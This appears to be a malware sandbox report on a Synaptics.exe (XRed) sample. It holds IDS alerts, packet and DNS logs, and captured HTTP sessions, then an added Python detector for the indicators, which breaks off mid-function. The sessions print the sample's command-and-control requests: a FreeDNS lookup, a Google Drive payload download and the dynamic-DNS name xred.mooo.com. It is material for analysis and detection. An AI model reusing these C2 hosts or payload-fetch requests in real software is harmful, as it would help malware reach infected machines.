2025-01-02T20:37:53.589740+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.5 | 49710 | 69.42.215.252 | 80 | TCP
2025-01-02T20:38:52.933059+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 50021 | 142.250.184.238 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 20:37:52.961759090 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:37:52.966711044 CET | 80 | 49710 | 69.42.215.252 | 192.168.2.5
Jan 2, 2025 20:37:52.966860056 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:37:52.967511892 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:37:52.972306967 CET | 80 | 49710 | 69.42.215.252 | 192.168.2.5
Jan 2, 2025 20:37:53.589658022 CET | 80 | 49710 | 69.42.215.252 | 192.168.2.5
Jan 2, 2025 20:37:53.589740038 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:38:23.590001106 CET | 80 | 49710 | 69.42.215.252 | 192.168.2.5
Jan 2, 2025 20:38:23.592152119 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:38:51.889208078 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:51.889269114 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:51.889324903 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:51.899507046 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:51.899528027 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.554207087 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.554311037 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.554932117 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.554995060 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.606677055 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.606709003 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.606947899 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.607006073 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.608402967 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.655328035 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.933087111 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.933152914 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.933171034 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.933212042 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.933280945 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.933320999 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.933496952 CET | 443 | 50021 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:52.933545113 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.933564901 CET | 50021 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:52.958626032 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:52.958669901 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:52.958730936 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:52.958980083 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:52.958993912 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:53.591867924 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:53.591945887 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:53.595084906 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:53.595097065 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:53.595442057 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:53.595494986 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:53.595765114 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:53.639334917 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.001878977 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.001936913 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.002120018 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:54.002120972 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:54.002185106 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.002213955 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.002238989 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:54.002262115 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:54.031074047 CET | 50022 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:54.031109095 CET | 443 | 50022 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:54.036359072 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.036412001 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.036482096 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.036675930 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.036693096 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.677253008 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.677397013 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.677906990 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.677969933 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.679697990 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.679708958 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.679924011 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:54.679975986 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.680365086 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:54.727343082 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:55.065007925 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:55.065099001 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:55.065125942 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:55.065180063 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:55.065267086 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:55.065300941 CET | 443 | 50024 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:55.065351009 CET | 50024 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:55.118268013 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.118304014 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:55.118371010 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.118613005 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.118623018 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:55.770210028 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:55.770292044 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.770716906 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.770728111 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:55.770909071 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:55.770912886 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.268788099 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.268841982 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.268897057 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:56.268922091 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.268935919 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:56.268970966 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:56.268975973 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.268984079 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.269020081 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:56.269704103 CET | 50025 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:56.269716978 CET | 443 | 50025 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:56.313522100 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.313558102 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.313631058 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.313888073 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.313901901 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.951216936 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.951384068 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.951872110 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.951932907 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.953629971 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.953643084 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.953849077 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:56.953901052 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.954279900 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:56.999327898 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:57.342274904 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:57.342343092 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:57.342431068 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:57.342468023 CET | 443 | 50027 | 142.250.184.238 | 192.168.2.5
Jan 2, 2025 20:38:57.342525959 CET | 50027 | 443 | 192.168.2.5 | 142.250.184.238
Jan 2, 2025 20:38:57.380855083 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:57.380887032 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:57.380959988 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:57.381176949 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:57.381186962 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.055962086 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.056024075 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.056499958 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.056504965 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.056780100 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.056783915 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.502979994 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.503035069 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.503088951 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.503099918 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.503142118 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.503144979 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.503180027 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:38:58.503220081 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.503748894 CET | 50029 | 443 | 192.168.2.5 | 142.250.185.97
Jan 2, 2025 20:38:58.503762007 CET | 443 | 50029 | 142.250.185.97 | 192.168.2.5
Jan 2, 2025 20:39:42.948669910 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:39:43.260817051 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:39:43.870245934 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:39:45.073311090 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:39:47.479609013 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:39:52.292053938 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Jan 2, 2025 20:40:01.901452065 CET | 49710 | 80 | 192.168.2.5 | 69.42.215.252
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 2, 2025 20:37:52.918334961 CET | 64406 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 20:37:52.925832987 CET | 53 | 64406 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 20:37:52.946017027 CET | 62018 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 20:37:52.953609943 CET | 53 | 62018 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 20:38:51.881697893 CET | 55025 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 20:38:51.888566971 CET | 53 | 55025 | 1.1.1.1 | 192.168.2.5
Jan 2, 2025 20:38:52.949984074 CET | 54139 | 53 | 192.168.2.5 | 1.1.1.1
Jan 2, 2025 20:38:52.957950115 CET | 53 | 54139 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 2, 2025 20:37:52.918334961 CET | 192.168.2.5 | 1.1.1.1 | 0xdea5 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:37:52.946017027 CET | 192.168.2.5 | 1.1.1.1 | 0x8bbd | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:51.881697893 CET | 192.168.2.5 | 1.1.1.1 | 0x892f | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:52.949984074 CET | 192.168.2.5 | 1.1.1.1 | 0x721d | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 2, 2025 20:37:52.925832987 CET | 1.1.1.1 | 192.168.2.5 | 0xdea5 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:37:52.953609943 CET | 1.1.1.1 | 192.168.2.5 | 0x8bbd | No error (0) | freedns.afraid.org | - | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:02.487092972 CET | 1.1.1.1 | 192.168.2.5 | 0x76e9 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 20:38:02.487092972 CET | 1.1.1.1 | 192.168.2.5 | 0x76e9 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:15.659782887 CET | 1.1.1.1 | 192.168.2.5 | 0x7a8e | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 20:38:15.659782887 CET | 1.1.1.1 | 192.168.2.5 | 0x7a8e | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:51.888566971 CET | 1.1.1.1 | 192.168.2.5 | 0x892f | No error (0) | docs.google.com | - | 142.250.184.238 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:52.957950115 CET | 1.1.1.1 | 192.168.2.5 | 0x721d | No error (0) | drive.usercontent.google.com | - | 142.250.185.97 | A (IP address) | IN (0x0001) | false
Jan 2, 2025 20:38:55.810477018 CET | 1.1.1.1 | 192.168.2.5 | 0x73b4 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 2, 2025 20:38:55.810477018 CET | 1.1.1.1 | 192.168.2.5 | 0x73b4 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
• docs.google.com
• drive.usercontent.google.com
• freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 69.42.215.252 | 80 | 7364 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Jan 2, 2025 20:37:52.967511892 CET | 154 | OUT |
  GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
  User-Agent: MyApp
  Host: freedns.afraid.org
  Cache-Control: no-cache
Jan 2, 2025 20:37:53.589658022 CET | 243 | IN |
  HTTP/1.1 200 OK
  Server: nginx
  Date: Thu, 02 Jan 2025 19:37:53 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Cache: MISS
  Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 1fERROR: Could not authenticate.0
  (The body is chunked: "1f" is the 0x1f-byte chunk size and the trailing "0" is the terminating zero-length chunk; the decoded payload is "ERROR: Could not authenticate.", so the FreeDNS lookup of the C2 address failed in this run.)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 50021 | 142.250.184.238 | 443 | 7364 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:52 UTC | 143 | OUT |
  GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Host: docs.google.com
  Cache-Control: no-cache
2025-01-02 19:38:52 UTC | 1314 | IN |
  HTTP/1.1 303 See Other
  Content-Type: application/binary
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Thu, 02 Jan 2025 19:38:52 GMT
  Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
  Strict-Transport-Security: max-age=31536000
  Cross-Origin-Opener-Policy: same-origin
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Content-Security-Policy: script-src 'report-sample' 'nonce-M9F3MQIymM5KvfBJZaC-CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Server: ESF
  Content-Length: 0
  X-XSS-Protection: 0
  X-Frame-Options: SAMEORIGIN
  X-Content-Type-Options: nosniff
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 50022 | 142.250.185.97 | 443 | 7364 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-02 19:38:53 UTC | 186 | OUT |
  GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
  User-Agent: Synaptics.exe
  Cache-Control: no-cache
  Host: drive.usercontent.google.com
  Connection: Keep-Alive
2025-01-02 19:38:53 UTC | 1601 | IN |
  HTTP/1.1 404 Not Found
  X-GUploader-UploadID: AFiumC5J2wcYuTkX-xkQT8FSKqGHktGrzCtpgjVhmKpHsBNkyL4wZjkxiFYFAAAXhYAcuOMjHRMwmuI
  Content-Type: text/html; charset=utf-8
  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
  Pragma: no-cache
  Expires: Mon, 01 Jan 1990 00:00:00 GMT
  Date: Thu, 02 Jan 2025 19:38:53 GMT
  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
  Content-Security-Policy: script-src 'report-sample' 'nonce-6t4U7rP3YozBkUnFONUWRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
  Cross-Origin-Opener-Policy: same-origin
  Content-Length: 1652
  Server: UploadServer
  Set-Cookie: NID=520=TcN9QCbwkPLrpJEQwIqIJjJwXgW-oXjSU-FW-l0H5tI2kzHFuRd--KBktVqdEu1fwBuybsRouem5aB1kf6SzDqJs_mHS3axzjWobW0aNHGlvwStyHpwULK53oMuNR9J0QhVOYMvpAFWulneU6fX885sVSliYynvBMuD-f6LToWuopUIl13vh13I; expires=Fri, 04-Jul-2025 19:38:53 GMT; path=/; domain=.google.com; HttpOnly
  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  Content-Security-Policy: sandbox allow-scripts
  Connection: close
2025-01-02 19:38:53 UTC | 1601 | IN |
  Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 4a 71 6f 38 6f 52 79 65 53 54 62 46 53 65 4c 47 74 51 74 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7Jqo8oRyeSTbFSeLGtQtpg">*{margin:0;padding:0}html,code{font:15px/22px arial
2025-01-02 19:38:53 UTC | 51 | IN |
  Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
  Data Ascii: his server. <ins>That’s all we know.</ins></main>
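The sessions above record the C2 resolution chain this run produced: the hard-coded dynamic-DNS name xred.mooo.com came back NXDOMAIN, the FreeDNS API call (`/api/?action=getdyndns&sha=...` with User-Agent `MyApp`) answered "ERROR: Could not authenticate.", and the Google Drive fallback (`/uc?id=...&export=download` with User-Agent `Synaptics.exe`) was redirected to drive.usercontent.google.com and then returned 404. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it rebuilds those requests as constructed input (the NID cookie is left out, and a browser request is added as a benign control), flags the three network indicators (the indicator names are my own), and decodes the chunked FreeDNS reply body from the hex dump shown in the first session to confirm what the client actually received.

```python
from typing import Dict, List, Tuple

# Constructed input: the requests Synaptics.exe sent in this report's capture,
# reassembled as raw HTTP/1.1 text, plus one benign browser request as a control.
SAMPLE_REQUESTS = [
    "GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1\r\n"
    "User-Agent: MyApp\r\nHost: freedns.afraid.org\r\nCache-Control: no-cache\r\n\r\n",
    "GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1\r\n"
    "User-Agent: Synaptics.exe\r\nHost: docs.google.com\r\nCache-Control: no-cache\r\n\r\n",
    "GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1\r\n"
    "User-Agent: Synaptics.exe\r\nCache-Control: no-cache\r\n"
    "Host: drive.usercontent.google.com\r\nConnection: Keep-Alive\r\n\r\n",
    # Constructed benign control: an ordinary browser fetch that must not be flagged.
    "GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Host: example.com\r\n\r\n",
]

# The "Data Raw" hex dump of the freedns.afraid.org reply body, as shown in the report.
FREEDNS_REPLY_HEX = (
    "31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 "
    "65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a"
)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP/1.1 request into (method, path, lower-cased header map)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def flag_request(raw: str) -> List[str]:
    """Return the XRed network indicators (my own names) that one request matches."""
    _method, path, headers = parse_request(raw)
    host = headers.get("host", "")
    ua = headers.get("user-agent", "")
    hits: List[str] = []
    # 1. Dynamic-DNS address lookup through the FreeDNS API.
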